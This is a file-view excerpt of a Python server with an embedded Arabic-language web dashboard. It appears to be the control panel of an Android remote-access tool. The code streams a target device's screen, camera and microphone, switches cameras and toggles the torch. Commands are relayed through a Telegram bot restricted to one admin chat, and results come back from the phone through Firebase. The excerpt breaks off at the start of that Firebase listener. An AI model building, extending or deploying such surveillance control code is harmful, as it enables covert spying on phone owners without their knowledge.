   187вҶ’   246вҶ’   275вҶ’   275вҶ’   275вҶ’  3274вҶ’if(!devId){notify('Ш§Ш®ШӘШұ Ш¬ЩҮШ§ШІШ§ЩӢ ШЈЩҲЩ„Ш§ЩӢ','var(--accent)');return;}
   188вҶ’   247вҶ’   276вҶ’   276вҶ’   276вҶ’  3275вҶ’_streamActive=true;_frameCount=0;_firstFrameReceived=false;_lastFrameData='';
   189вҶ’   248вҶ’   277вҶ’   277вҶ’   277вҶ’  3276вҶ’document.getElementById('btnStartStream').style.display='none';
   190вҶ’   249вҶ’   278вҶ’   278вҶ’   278вҶ’  3277вҶ’document.getElementById('btnStopStream').style.display='';
   191вҶ’   250вҶ’   279вҶ’   279вҶ’   279вҶ’  3278вҶ’document.getElementById('btnSwitchCam').style.display=_streamType==='camera'?'':'none';
   192вҶ’   251вҶ’   280вҶ’   280вҶ’   280вҶ’  3279вҶ’document.getElementById('stFrames').textContent='0';
   193вҶ’   252вҶ’   281вҶ’   281вҶ’   281вҶ’  3280вҶ’document.getElementById('stLastAct').textContent='-';
   194вҶ’   253вҶ’   282вҶ’   282вҶ’   282вҶ’  3281вҶ’var typeLabel=_streamType==='screen'?'Ш§Щ„ШҙШ§ШҙШ©':_streamType==='camera'?'Ш§Щ„ЩғШ§Щ…ЩҠШұШ§':'Ш§Щ„ШөЩҲШӘ';
   195вҶ’   254вҶ’   283вҶ’   283вҶ’   283вҶ’  3282вҶ’document.getElementById('stType').textContent=typeLabel;
   196вҶ’   255вҶ’   284вҶ’   284вҶ’   284вҶ’  3283вҶ’var dev=DEVICES.find(function(d){return d.id===devId;});
   197вҶ’   256вҶ’   285вҶ’   285вҶ’   285вҶ’  3284вҶ’document.getElementById('stDevice').textContent=(dev&&dev.name)||devId;
   198вҶ’   257вҶ’   286вҶ’   286вҶ’   286вҶ’  3285вҶ’_setViewerState('waiting');
   199вҶ’   258вҶ’   287вҶ’   287вҶ’   287вҶ’  3286вҶ’notify('Ш¬Ш§ШұЩҠ ШЁШҜШЎ Ш§Щ„ШЁШ«: '+typeLabel);
   200вҶ’   259вҶ’   288вҶ’   288вҶ’   288вҶ’  3287вҶ’var interval=_streamType==='audio'?5:_streamQuality;
   201вҶ’   260вҶ’   289вҶ’   289вҶ’   289вҶ’  3288вҶ’var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:_streamType,interval:interval})});
   202вҶ’   261вҶ’   290вҶ’   290вҶ’   290вҶ’  3289вҶ’if(!r.ok){notify('ЩҒШҙЩ„ ШЁШҜШЎ Ш§Щ„ШЁШ«: '+(r.error||''),'var(--accent)');_setViewerState('error');_streamActive=false;document.getElementById('btnStartStream').style.display='';document.getElementById('btnStopStream').style.display='none';return;}
   203вҶ’   262вҶ’   291вҶ’   291вҶ’   291вҶ’  3290вҶ’notify('ШӘЩ… ШЁШҜШЎ Ш§Щ„ШЁШ« - ШЁШ§ЩҶШӘШёШ§Шұ Ш§Щ„ШҘШ·Ш§Шұ Ш§Щ„ШЈЩҲЩ„...');
   204вҶ’   263вҶ’   292вҶ’   292вҶ’   292вҶ’  3291вҶ’startStreamPolling(devId);
   205вҶ’   264вҶ’   293вҶ’   293вҶ’   293вҶ’  3292вҶ’if(_streamWaitingTimer)clearTimeout(_streamWaitingTimer);
   206вҶ’   265вҶ’   294вҶ’   294вҶ’   294вҶ’  3293вҶ’_streamWaitingTimer=setTimeout(function(){if(_streamActive&&!_firstFrameReceived){_setViewerState('error');}},60000);
   207вҶ’   266вҶ’   295вҶ’   295вҶ’   295вҶ’  3294вҶ’}
   208вҶ’   267вҶ’   296вҶ’   296вҶ’   296вҶ’  3295вҶ’
   209вҶ’   268вҶ’   297вҶ’   297вҶ’   297вҶ’  3296вҶ’async function stopStream(){
   210вҶ’   269вҶ’   298вҶ’   298вҶ’   298вҶ’  3297вҶ’var devId=document.getElementById('streamDevice').value;
   211вҶ’   270вҶ’   299вҶ’   299вҶ’   299вҶ’  3298вҶ’if(!devId)return;
   212вҶ’   271вҶ’   300вҶ’   300вҶ’   300вҶ’  3299вҶ’api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
   213вҶ’   272вҶ’   301вҶ’   301вҶ’   301вҶ’  3300вҶ’_cleanupStream();
   214вҶ’   273вҶ’   302вҶ’   302вҶ’   302вҶ’  3301вҶ’notify('ШӘЩ… ШҘЩҠЩӮШ§ЩҒ Ш§Щ„ШЁШ«');
   215вҶ’   274вҶ’   303вҶ’   303вҶ’   303вҶ’  3302вҶ’}
   216вҶ’   275вҶ’   304вҶ’   304вҶ’   304вҶ’  3303вҶ’
   217вҶ’   276вҶ’   305вҶ’   305вҶ’   305вҶ’  3304вҶ’function _cleanupStream(){
   218вҶ’   277вҶ’   306вҶ’   306вҶ’   306вҶ’  3305вҶ’_streamActive=false;_firstFrameReceived=false;_lastFrameData='';
   219вҶ’   278вҶ’   307вҶ’   307вҶ’   307вҶ’  3306вҶ’if(_streamPollTimer){clearInterval(_streamPollTimer);_streamPollTimer=null;}
   220вҶ’   279вҶ’   308вҶ’   308вҶ’   308вҶ’  3307вҶ’if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}
   221вҶ’   280вҶ’   309вҶ’   309вҶ’   309вҶ’  3308вҶ’if(_audioAnimFrame){cancelAnimationFrame(_audioAnimFrame);_audioAnimFrame=null;}
   222вҶ’   281вҶ’   310вҶ’   310вҶ’   310вҶ’  3309вҶ’document.getElementById('btnStartStream').style.display='';
   223вҶ’   282вҶ’   311вҶ’   311вҶ’   311вҶ’  3310вҶ’document.getElementById('btnStopStream').style.display='none';
   224вҶ’   283вҶ’   312вҶ’   312вҶ’   312вҶ’  3311вҶ’document.getElementById('btnSwitchCam').style.display='none';
   225вҶ’   284вҶ’   313вҶ’   313вҶ’   313вҶ’  3312вҶ’_setViewerState('idle');
   226вҶ’   285вҶ’   314вҶ’   314вҶ’   314вҶ’  3313вҶ’document.getElementById('stStatus').textContent='Щ…ШӘЩҲЩӮЩҒ';
   227вҶ’   286вҶ’   315вҶ’   315вҶ’   315вҶ’  3314вҶ’}
   228вҶ’   287вҶ’   316вҶ’   316вҶ’   316вҶ’  3315вҶ’
   229вҶ’   288вҶ’   317вҶ’   317вҶ’   317вҶ’  3316вҶ’async function switchCamera(){
   230вҶ’   289вҶ’   318вҶ’   318вҶ’   318вҶ’  3317вҶ’var devId=document.getElementById('streamDevice').value;
   231вҶ’   290вҶ’   319вҶ’   319вҶ’   319вҶ’  3318вҶ’if(!devId)return;
   232вҶ’   291вҶ’   320вҶ’   320вҶ’   320вҶ’  3319вҶ’if(_streamType==='front_camera') _streamType='back_camera';
   233вҶ’   292вҶ’   321вҶ’   321вҶ’   321вҶ’  3320вҶ’else if(_streamType==='back_camera') _streamType='front_camera';
   234вҶ’   293вҶ’   322вҶ’   322вҶ’   322вҶ’  3321вҶ’else _streamType='camera';
   235вҶ’   294вҶ’   323вҶ’   323вҶ’   323вҶ’  3322вҶ’if(_streamActive){stopStream();setTimeout(function(){startStream();},500);}
   236вҶ’   295вҶ’   324вҶ’   324вҶ’   324вҶ’  3323вҶ’else{startStream();}
   237вҶ’   296вҶ’   325вҶ’   325вҶ’   325вҶ’  3324вҶ’notify('ШӘЩ… ШӘШЁШҜЩҠЩ„ Ш§Щ„ЩғШ§Щ…ЩҠШұШ§');
   238вҶ’   297вҶ’   326вҶ’   326вҶ’   326вҶ’  3325вҶ’}
   239вҶ’   298вҶ’   327вҶ’   327вҶ’   327вҶ’  3326вҶ’
   240вҶ’   299вҶ’   328вҶ’   328вҶ’   328вҶ’  3327вҶ’function _onFrameReceived(base64Data,isAudio){
   241вҶ’   300вҶ’   329вҶ’   329вҶ’   329вҶ’  3328вҶ’if(base64Data===_lastFrameData)return;
   242вҶ’   301вҶ’   330вҶ’   330вҶ’   330вҶ’  3329вҶ’_lastFrameData=base64Data;
   243вҶ’   302вҶ’   331вҶ’   331вҶ’   331вҶ’  3330вҶ’if(!_firstFrameReceived){_firstFrameReceived=true;if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}}
   244вҶ’   303вҶ’   332вҶ’   332вҶ’   332вҶ’  3331вҶ’_frameCount++;
   245вҶ’   304вҶ’   333вҶ’   333вҶ’   333вҶ’  3332вҶ’document.getElementById('stFrames').textContent=_frameCount;
   246вҶ’   305вҶ’   334вҶ’   334вҶ’   334вҶ’  3333вҶ’document.getElementById('stLastAct').textContent=new Date().toLocaleTimeString();
   247вҶ’   306вҶ’   335вҶ’   335вҶ’   335вҶ’  3334вҶ’if(isAudio){_setViewerState('receiving_audio');}
   248вҶ’   307вҶ’   336вҶ’   336вҶ’   336вҶ’  3335вҶ’else{_setViewerState('receiving_video');document.getElementById('streamImg').src='data:image/jpeg;base64,'+base64Data;}
   249вҶ’   308вҶ’   337вҶ’   337вҶ’   337вҶ’  3336вҶ’}
   250вҶ’   309вҶ’   338вҶ’   338вҶ’   338вҶ’  3337вҶ’
   251вҶ’   310вҶ’   339вҶ’   339вҶ’   339вҶ’  3338вҶ’function startStreamPolling(devId){
   252вҶ’   311вҶ’   340вҶ’   340вҶ’   340вҶ’  3339вҶ’if(_streamPollTimer)clearInterval(_streamPollTimer);
   253вҶ’   312вҶ’   341вҶ’   341вҶ’   341вҶ’  3340вҶ’_streamPollTimer=setInterval(async function(){
   254вҶ’   313вҶ’   342вҶ’   342вҶ’   342вҶ’  3341вҶ’if(!_streamActive)return;
   255вҶ’   314вҶ’   343вҶ’   343вҶ’   343вҶ’  3342вҶ’try{
   256вҶ’   315вҶ’   344вҶ’   344вҶ’   344вҶ’  3343вҶ’var typeParam=_streamType==='audio'?'audio':'video';
   257вҶ’   316вҶ’   345вҶ’   345вҶ’   345вҶ’  3344вҶ’var resp=await fetch('/api/stream/frame/'+devId+'?type='+typeParam,{headers:{'Authorization':'Bearer '+TOKEN}});
   258вҶ’   317вҶ’   346вҶ’   346вҶ’   346вҶ’  3345вҶ’var r=await resp.json();
   259вҶ’   318вҶ’   347вҶ’   347вҶ’   347вҶ’  3346вҶ’if(r.ok&&r.data&&r.data.length>50){_onFrameReceived(r.data,false);}
   260вҶ’   319вҶ’   348вҶ’   348вҶ’   348вҶ’  3347вҶ’else if(r.ok&&_firstFrameReceived){}
   261вҶ’   320вҶ’   349вҶ’   349вҶ’   349вҶ’  3348вҶ’else if(!_firstFrameReceived){
   262вҶ’   321вҶ’   350вҶ’   350вҶ’   350вҶ’  3349вҶ’try{var sr=await fetch('/api/stream/status',{headers:{'Authorization':'Bearer '+TOKEN}});var status=await sr.json();if(status.ok&&status.active_streams&&status.active_streams[devId]){if(!_firstFrameReceived)_setViewerState('connected');}else if(!_firstFrameReceived&&_streamActive){_setViewerState('waiting');}}catch(e){}
   263вҶ’   322вҶ’   351вҶ’   351вҶ’   351вҶ’  3350вҶ’}
   264вҶ’   323вҶ’   352вҶ’   352вҶ’   352вҶ’  3351вҶ’}catch(e){}
   265вҶ’   324вҶ’   353вҶ’   353вҶ’   353вҶ’  3352вҶ’},2000);
   266вҶ’   325вҶ’   354вҶ’   354вҶ’   354вҶ’  3353вҶ’}
   267вҶ’   326вҶ’   355вҶ’   355вҶ’   355вҶ’  3354вҶ’
   268вҶ’   327вҶ’   356вҶ’   356вҶ’   356вҶ’  3355вҶ’// Add streaming category to commands
   269вҶ’   328вҶ’   357вҶ’   357вҶ’   357вҶ’  3356вҶ’if(typeof CMD_CATEGORIES!=='undefined'){
   270вҶ’   329вҶ’   358вҶ’   358вҶ’   358вҶ’  3357вҶ’CMD_CATEGORIES.streaming={label:'рҹ“Ў Streaming',cmds:['start_screen_stream','stop_screen_stream','start_camera_stream','stop_camera_stream','switch_camera','start_audio_stream','stop_audio_stream','get_stream_status','set_stream_quality','enable_torch','pause_stream','resume_stream','stop_all_streams','get_stream_capabilities']};
   271вҶ’   330вҶ’   359вҶ’   359вҶ’   359вҶ’  3358вҶ’if(document.getElementById('cmdTabs')){
   272вҶ’   331вҶ’   360вҶ’   360вҶ’   360вҶ’  3359вҶ’var tabs=document.getElementById('cmdTabs');
   273вҶ’   332вҶ’   361вҶ’   361вҶ’   361вҶ’  3360вҶ’if(tabs.innerHTML.indexOf('Streaming')===-1){
   274вҶ’   333вҶ’   362вҶ’   362вҶ’   362вҶ’  3361вҶ’tabs.innerHTML+='<button class="tab" onclick="showCmdCat(\'streaming\',this)">рҹ“Ў Streaming</button>';
   275вҶ’   334вҶ’   363вҶ’   363вҶ’   363вҶ’  3362вҶ’}
   276вҶ’   335вҶ’   364вҶ’   364вҶ’   364вҶ’  3363вҶ’}
   277вҶ’   336вҶ’   365вҶ’   365вҶ’   365вҶ’  3364вҶ’}
   278вҶ’   337вҶ’   366вҶ’   366вҶ’   366вҶ’  3365вҶ’</script>
   279вҶ’   338вҶ’   367вҶ’   367вҶ’   367вҶ’  3366вҶ’</body>
   280вҶ’   339вҶ’   368вҶ’   368вҶ’   368вҶ’  3367вҶ’</html>"""
   281вҶ’   340вҶ’   369вҶ’   369вҶ’   369вҶ’  3368вҶ’
   282вҶ’   341вҶ’   370вҶ’   370вҶ’   370вҶ’  3369вҶ’# ============================================================================
   283вҶ’   342вҶ’   371вҶ’   371вҶ’   371вҶ’  3370вҶ’# WEB DASHBOARD ROUTE
   284вҶ’   343вҶ’   372вҶ’   372вҶ’   372вҶ’  3371вҶ’# ============================================================================
   285вҶ’   344вҶ’   373вҶ’   373вҶ’   373вҶ’  3372вҶ’
   286вҶ’   345вҶ’   374вҶ’   374вҶ’   374вҶ’  3373вҶ’async def serve_dashboard(request):
   287вҶ’   346вҶ’   375вҶ’   375вҶ’   375вҶ’  3374вҶ’    return web.Response(text=DASHBOARD_HTML, content_type="text/html", charset="utf-8")
   288вҶ’   347вҶ’   376вҶ’   376вҶ’   376вҶ’  3375вҶ’
   289вҶ’   348вҶ’   377вҶ’   377вҶ’   377вҶ’  3376вҶ’# ============================================================================
   290вҶ’   349вҶ’   378вҶ’   378вҶ’   378вҶ’  3377вҶ’# GETUPDATES POLLING
   291вҶ’   350вҶ’   379вҶ’   379вҶ’   379вҶ’  3378вҶ’# ============================================================================
   292вҶ’   351вҶ’   380вҶ’   380вҶ’   380вҶ’  3379вҶ’
   293вҶ’   352вҶ’   381вҶ’   381вҶ’   381вҶ’  3380вҶ’async def tg_poll_loop():
   294вҶ’   353вҶ’   382вҶ’   382вҶ’   382вҶ’  3381вҶ’    global tg_offset, polling_active, _processed_update_ids, _processed_message_keys, _message_dedup, _chat_rate_counter, _data_forward_dedup
   295вҶ’   354вҶ’   383вҶ’   383вҶ’   383вҶ’  3382вҶ’    polling_active = True
   296вҶ’   355вҶ’   384вҶ’   384вҶ’   384вҶ’  3383вҶ’    
   297вҶ’   356вҶ’   385вҶ’   385вҶ’   385вҶ’  3384вҶ’    # === ШӘЩҶШёЩҠЩҒ Ш§Щ„Ш§ШӘШөШ§Щ„Ш§ШӘ Ш§Щ„ЩӮШҜЩҠЩ…Ш© Ш№ЩҶШҜ ШЁШҜШЎ Ш§Щ„ШӘШҙШәЩҠЩ„ ===
   298вҶ’   357вҶ’   386вҶ’   386вҶ’   386вҶ’  3385вҶ’    log.info("Cleaning old connections (deleteWebhook)...")
   299вҶ’   358вҶ’   387вҶ’   387вҶ’   387вҶ’  3386вҶ’    try:
   300вҶ’   359вҶ’   388вҶ’   388вҶ’   388вҶ’  3387вҶ’        session = get_tg_session()
   301вҶ’   360вҶ’   389вҶ’   389вҶ’   389вҶ’  3388вҶ’        # ШӯШ°ЩҒ webhook ЩҲШӘШ¬Ш§ЩҮЩ„ Ш§Щ„ШӘШӯШҜЩҠШ«Ш§ШӘ Ш§Щ„Щ…Ш№Щ„ЩӮШ©
   302вҶ’   361вҶ’   390вҶ’   390вҶ’   390вҶ’  3389вҶ’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/deleteWebhook?drop_pending_updates=true") as resp:
   303вҶ’   362вҶ’   391вҶ’   391вҶ’   391вҶ’  3390вҶ’            r = await resp.json()
   304вҶ’   363вҶ’   392вҶ’   392вҶ’   392вҶ’  3391вҶ’            log.info("deleteWebhook: %s", r.get("description", r.get("ok")))
   305вҶ’   364вҶ’   393вҶ’   393вҶ’   393вҶ’  3392вҶ’        await asyncio.sleep(1)
   306вҶ’   365вҶ’   394вҶ’   394вҶ’   394вҶ’  3393вҶ’        # Ш§Щ„ШӘШӯЩӮЩӮ Щ…ЩҶ Ш§Щ„ШЁЩҲШӘ
   307вҶ’   366вҶ’   395вҶ’   395вҶ’   395вҶ’  3394вҶ’        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/getMe") as resp:
   308вҶ’   367вҶ’   396вҶ’   396вҶ’   396вҶ’  3395вҶ’            me = await resp.json()
   309вҶ’   368вҶ’   397вҶ’   397вҶ’   397вҶ’  3396вҶ’            if me.get("ok"):
   310вҶ’   369вҶ’   398вҶ’   398вҶ’   398вҶ’  3397вҶ’                log.info("Bot connected: @%s (%s)", me["result"].get("username", "?"), me["result"].get("first_name", "?"))
   311вҶ’   370вҶ’   399вҶ’   399вҶ’   399вҶ’  3398вҶ’            else:
   312вҶ’   371вҶ’   400вҶ’   400вҶ’   400вҶ’  3399вҶ’                log.warning("getMe failed: %s", me)
   313вҶ’   372вҶ’   401вҶ’   401вҶ’   401вҶ’  3400вҶ’        await asyncio.sleep(1)
   314вҶ’   373вҶ’   402вҶ’   402вҶ’   402вҶ’  3401вҶ’    except Exception as exc:
   315вҶ’   374вҶ’   403вҶ’   403вҶ’   403вҶ’  3402вҶ’        log.warning("Connection cleanup: %s", exc)
   316вҶ’   375вҶ’   404вҶ’   404вҶ’   404вҶ’  3403вҶ’    
   317вҶ’   376вҶ’   405вҶ’   405вҶ’   405вҶ’  3404вҶ’    log.info("Starting Telegram getUpdates polling...")
   318вҶ’   377вҶ’   406вҶ’   406вҶ’   406вҶ’  3405вҶ’    
   319вҶ’   378вҶ’   407вҶ’   407вҶ’   407вҶ’  3406вҶ’    _conflict_count = 0
   320вҶ’   379вҶ’   408вҶ’   408вҶ’   408вҶ’  3407вҶ’    while polling_active:
   321вҶ’   380вҶ’   409вҶ’   409вҶ’   409вҶ’  3408вҶ’        try:
   322вҶ’   381вҶ’   410вҶ’   410вҶ’   410вҶ’  3409вҶ’            payload = {
   323вҶ’   382вҶ’   411вҶ’   411вҶ’   411вҶ’  3410вҶ’                "offset": tg_offset,
   324вҶ’   383вҶ’   412вҶ’   412вҶ’   412вҶ’  3411вҶ’                "timeout": 30,
   325вҶ’   384вҶ’   413вҶ’   413вҶ’   413вҶ’  3412вҶ’                "allowed_updates": ["message", "callback_query"],
   326вҶ’   385вҶ’   414вҶ’   414вҶ’   414вҶ’  3413вҶ’            }
   327вҶ’   386вҶ’   415вҶ’   415вҶ’   415вҶ’  3414вҶ’            result = await tg_request("getUpdates", payload)
   328вҶ’   387вҶ’   416вҶ’   416вҶ’   416вҶ’  3415вҶ’            if not result or not result.get("ok"):
   329вҶ’   388вҶ’   417вҶ’   417вҶ’   417вҶ’  3416вҶ’                desc = (result or {}).get("description", "")
   330вҶ’   389вҶ’   418вҶ’   418вҶ’   418вҶ’  3417вҶ’                if "Conflict" in desc:
   331вҶ’   390вҶ’   419вҶ’   419вҶ’   419вҶ’  3418вҶ’                    _conflict_count += 1
   332вҶ’   391вҶ’   420вҶ’   420вҶ’   420вҶ’  3419вҶ’                    log.warning("Conflict detected (%d), waiting...", _conflict_count)
   333вҶ’   392вҶ’   421вҶ’   421вҶ’   421вҶ’  3420вҶ’                    await asyncio.sleep(8)
   334вҶ’   393вҶ’   422вҶ’   422вҶ’   422вҶ’  3421вҶ’                else:
   335вҶ’   394вҶ’   423вҶ’   423вҶ’   423вҶ’  3422вҶ’                    await asyncio.sleep(2)
   336вҶ’   395вҶ’   424вҶ’   424вҶ’   424вҶ’  3423вҶ’                continue
   337вҶ’   396вҶ’   425вҶ’   425вҶ’   425вҶ’  3424вҶ’            _conflict_count = 0  # ШҘШ№Ш§ШҜШ© Ш§Щ„Ш№ШҜШ§ШҜ Ш№ЩҶШҜ Ш§Щ„ЩҶШ¬Ш§Шӯ
   338вҶ’   397вҶ’   426вҶ’   426вҶ’   426вҶ’  3425вҶ’            
   339вҶ’   398вҶ’   427вҶ’   427вҶ’   427вҶ’  3426вҶ’            # Periodic cleanup (every 100 polls)
   340вҶ’   399вҶ’   428вҶ’   428вҶ’   428вҶ’  3427вҶ’            if not hasattr(tg_poll_loop, '_poll_count'):
   341вҶ’   400вҶ’   429вҶ’   429вҶ’   429вҶ’  3428вҶ’                tg_poll_loop._poll_count = 0
   342вҶ’   401вҶ’   430вҶ’   430вҶ’   430вҶ’  3429вҶ’            tg_poll_loop._poll_count += 1
   343вҶ’   402вҶ’   431вҶ’   431вҶ’   431вҶ’  3430вҶ’            if tg_poll_loop._poll_count % 100 == 0:
   344вҶ’   403вҶ’   432вҶ’   432вҶ’   432вҶ’  3431вҶ’                now = time.time()
   345вҶ’   404вҶ’   433вҶ’   433вҶ’   433вҶ’  3432вҶ’                _message_dedup = {k: v for k, v in _message_dedup.items() if now - v > 600}
   346вҶ’   405вҶ’   434вҶ’   434вҶ’   434вҶ’  3433вҶ’                _chat_rate_counter = {k: v for k, v in _chat_rate_counter.items() if v and now - v[-1] > 300}
   347вҶ’   406вҶ’   435вҶ’   435вҶ’   435вҶ’  3434вҶ’                _data_forward_dedup = {k: v for k, v in _data_forward_dedup.items() if now - v > 300}
   348вҶ’   407вҶ’   436вҶ’   436вҶ’   436вҶ’  3435вҶ’            
   349вҶ’   408вҶ’   437вҶ’   437вҶ’   437вҶ’  3436вҶ’            updates = result.get("result", [])
   350вҶ’   409вҶ’   438вҶ’   438вҶ’   438вҶ’  3437вҶ’            for update in updates:
   351вҶ’   410вҶ’   439вҶ’   439вҶ’   439вҶ’  3438вҶ’                update_id = update.get("update_id", 0)
   352вҶ’   411вҶ’   440вҶ’   440вҶ’   440вҶ’  3439вҶ’                tg_offset = update_id + 1
   353вҶ’   412вҶ’   441вҶ’   441вҶ’   441вҶ’  3440вҶ’                
   354вҶ’   413вҶ’   442вҶ’   442вҶ’   442вҶ’  3441вҶ’                # === Щ…ЩҶШ№ ШӘЩғШұШ§Шұ Щ…Ш№Ш§Щ„Ш¬Ш© ЩҶЩҒШі Ш§Щ„ШӘШӯШҜЩҠШ« ===
   355вҶ’   414вҶ’   443вҶ’   443вҶ’   443вҶ’  3442вҶ’                if update_id in _processed_update_ids:
   356вҶ’   415вҶ’   444вҶ’   444вҶ’   444вҶ’  3443вҶ’                    continue
   357вҶ’   416вҶ’   445вҶ’   445вҶ’   445вҶ’  3444вҶ’                _processed_update_ids.add(update_id)
   358вҶ’   417вҶ’   446вҶ’   446вҶ’   446вҶ’  3445вҶ’                if len(_processed_update_ids) > 1000:
   359вҶ’   418вҶ’   447вҶ’   447вҶ’   447вҶ’  3446вҶ’                    _processed_update_ids = set(list(_processed_update_ids)[-500:])
   360вҶ’   419вҶ’   448вҶ’   448вҶ’   448вҶ’  3447вҶ’                
   361вҶ’   420вҶ’   449вҶ’   449вҶ’   449вҶ’  3448вҶ’                # Handle message
   362вҶ’   421вҶ’   450вҶ’   450вҶ’   450вҶ’  3449вҶ’                if "message" in update:
   363вҶ’   422вҶ’   451вҶ’   451вҶ’   451вҶ’  3450вҶ’                    msg = update["message"]
   364вҶ’   423вҶ’   452вҶ’   452вҶ’   452вҶ’  3451вҶ’                    chat_id = msg.get("chat", {}).get("id")
   365вҶ’   424вҶ’   453вҶ’   453вҶ’   453вҶ’  3452вҶ’                    text = msg.get("text", "")
   366вҶ’   425вҶ’   454вҶ’   454вҶ’   454вҶ’  3453вҶ’                    msg_id = msg.get("message_id", 0)
   367вҶ’   426вҶ’   455вҶ’   455вҶ’   455вҶ’  3454вҶ’                    
   368вҶ’   427вҶ’   456вҶ’   456вҶ’   456вҶ’  3455вҶ’                    # === Щ…ЩҶШ№ ШӘЩғШұШ§Шұ Щ…Ш№Ш§Щ„Ш¬Ш© ЩҶЩҒШі Ш§Щ„ШұШіШ§Щ„Ш© ШЁШ§Щ„Ш¶ШЁШ· ===
   369вҶ’   428вҶ’   457вҶ’   457вҶ’   457вҶ’  3456вҶ’                    msg_key = f"{chat_id}:{msg_id}"
   370вҶ’   429вҶ’   458вҶ’   458вҶ’   458вҶ’  3457вҶ’                    if msg_key in _processed_message_keys:
   371вҶ’   430вҶ’   459вҶ’   459вҶ’   459вҶ’  3458вҶ’                        continue
   372вҶ’   431вҶ’   460вҶ’   460вҶ’   460вҶ’  3459вҶ’                    _processed_message_keys.add(msg_key)
   373вҶ’   432вҶ’   461вҶ’   461вҶ’   461вҶ’  3460вҶ’                    if len(_processed_message_keys) > 500:
   374вҶ’   433вҶ’   462вҶ’   462вҶ’   462вҶ’  3461вҶ’                        _processed_message_keys = set(list(_processed_message_keys)[-200:])
   375вҶ’   434вҶ’   463вҶ’   463вҶ’   463вҶ’  3462вҶ’                    
   376вҶ’   435вҶ’   464вҶ’   464вҶ’   464вҶ’  3463вҶ’                    if chat_id != ADMIN_CHAT_ID:
   377вҶ’   436вҶ’   465вҶ’   465вҶ’   465вҶ’  3464вҶ’                        log.warning("Unauthorized access from %s", chat_id)
   378вҶ’   437вҶ’   466вҶ’   466вҶ’   466вҶ’  3465вҶ’                        continue
   379вҶ’   438вҶ’   467вҶ’   467вҶ’   467вҶ’  3466вҶ’                    
   380вҶ’   439вҶ’   468вҶ’   468вҶ’   468вҶ’  3467вҶ’                    if text.startswith("/"):
   381вҶ’   440вҶ’   469вҶ’   469вҶ’   469вҶ’  3468вҶ’                        await handle_telegram_command(chat_id, text, msg_id)
   382вҶ’   441вҶ’   470вҶ’   470вҶ’   470вҶ’  3469вҶ’                
   383вҶ’   442вҶ’   471вҶ’   471вҶ’   471вҶ’  3470вҶ’                # Handle callback query
   384вҶ’   443вҶ’   472вҶ’   472вҶ’   472вҶ’  3471вҶ’                if "callback_query" in update:
   385вҶ’   444вҶ’   473вҶ’   473вҶ’   473вҶ’  3472вҶ’                    cb = update["callback_query"]
   386вҶ’   445вҶ’   474вҶ’   474вҶ’   474вҶ’  3473вҶ’                    cb_id = cb.get("id", "")
   387вҶ’   446вҶ’   475вҶ’   475вҶ’   475вҶ’  3474вҶ’                    cb_chat = cb.get("message", {}).get("chat", {}).get("id")
   388вҶ’   447вҶ’   476вҶ’   476вҶ’   476вҶ’  3475вҶ’                    
   389вҶ’   448вҶ’   477вҶ’   477вҶ’   477вҶ’  3476вҶ’                    # === Щ…ЩҶШ№ ШӘЩғШұШ§Шұ Щ…Ш№Ш§Щ„Ш¬Ш© ЩҶЩҒШі Ш§Щ„ЩҖ callback ===
   390вҶ’   449вҶ’   478вҶ’   478вҶ’   478вҶ’  3477вҶ’                    cb_key = f"cb:{cb_id}"
   391вҶ’   450вҶ’   479вҶ’   479вҶ’   479вҶ’  3478вҶ’                    if cb_key in _processed_message_keys:
   392вҶ’   451вҶ’   480вҶ’   480вҶ’   480вҶ’  3479вҶ’                        continue
   393вҶ’   452вҶ’   481вҶ’   481вҶ’   481вҶ’  3480вҶ’                    _processed_message_keys.add(cb_key)
   394вҶ’   453вҶ’   482вҶ’   482вҶ’   482вҶ’  3481вҶ’                    
   395вҶ’   454вҶ’   483вҶ’   483вҶ’   483вҶ’  3482вҶ’                    if cb_chat != ADMIN_CHAT_ID:
   396вҶ’   455вҶ’   484вҶ’   484вҶ’   484вҶ’  3483вҶ’                        continue
   397вҶ’   456вҶ’   485вҶ’   485вҶ’   485вҶ’  3484вҶ’                    await handle_callback_query(cb)
   398вҶ’   457вҶ’   486вҶ’   486вҶ’   486вҶ’  3485вҶ’        
   399вҶ’   458вҶ’   487вҶ’   487вҶ’   487вҶ’  3486вҶ’        except asyncio.CancelledError:
   400вҶ’   459вҶ’   488вҶ’   488вҶ’   488вҶ’  3487вҶ’            break
   401вҶ’   460вҶ’   489вҶ’   489вҶ’   489вҶ’  3488вҶ’        except Exception as exc:
   402вҶ’   461вҶ’   490вҶ’   490вҶ’   490вҶ’  3489вҶ’            log.error("Poll error: %s", exc)
   403вҶ’   462вҶ’   491вҶ’   491вҶ’   491вҶ’  3490вҶ’            await asyncio.sleep(3)
   404вҶ’   463вҶ’   492вҶ’   492вҶ’   492вҶ’  3491вҶ’
   405вҶ’   464вҶ’   493вҶ’   493вҶ’   493вҶ’  3492вҶ’# ============================================================================
   406вҶ’   465вҶ’   494вҶ’   494вҶ’   494вҶ’  3493вҶ’# FIREBASE COMMAND RESULT LISTENER
   407вҶ’   466вҶ’   495вҶ’   495вҶ’   495вҶ’  3494вҶ’# ============================================================================
   408вҶ’   467вҶ’   496вҶ’   496вҶ’   496вҶ’  3495вҶ’
   409вҶ’   468вҶ’   497вҶ’   497вҶ’   497вҶ’  3496вҶ’async def firebase_result_listener():
   410вҶ’   469вҶ’   498вҶ’   498вҶ’   498вҶ’  3497вҶ’    """Background task: Poll Firebase for results from Android app.
   411вҶ’   470вҶ’   499вҶ’   499вҶ’   499вҶ’  3498вҶ’    ACTIVE mode - forwards results to Telegram admin."""
   412вҶ’   471вҶ’   500вҶ’   500вҶ’   500вҶ’  3499вҶ’    global _processed_results
   413вҶ’   472вҶ’   501вҶ’   501вҶ’
   414вҶ’   473вҶ’   502вҶ’   502вҶ’[showing lines 1-500 of 502; use offset=501 with limit to continue reading]